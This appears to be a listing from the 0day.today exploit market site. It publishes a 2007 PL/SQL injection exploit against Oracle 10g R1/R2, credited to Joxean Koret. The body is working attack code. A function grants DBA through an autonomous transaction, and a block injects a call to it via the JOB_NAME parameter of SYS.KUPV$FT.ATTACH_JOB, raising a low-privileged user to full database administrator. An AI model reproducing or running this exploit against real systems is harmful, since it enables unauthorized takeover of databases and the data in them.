[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit

Author
Joxean Koret
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-7625
Category
local exploits
Date add
23-01-2007
Platform
multiple
==========================================================
Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit
==========================================================



/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <joxeankoret@yahoo.es>
* Privileges needed:
*
* - EXECUTE_CATALOG_ROLE
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;

CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/

DECLARE
USER_NAME VARCHAR2(200);
JOB_NAME VARCHAR2(200);
NEW_JOB BOOLEAN;
v_Return NUMBER;
BEGIN
USER_NAME := 'OWNER';
JOB_NAME := ''' OR ' || USER || '.f1() = 1--';

v_Return := SYS.KUPV$FT.ATTACH_JOB(
USER_NAME => USER_NAME,
JOB_NAME => JOB_NAME,
NEW_JOB => NEW_JOB
);
END;
/



#  0day.today [2024-12-24]  #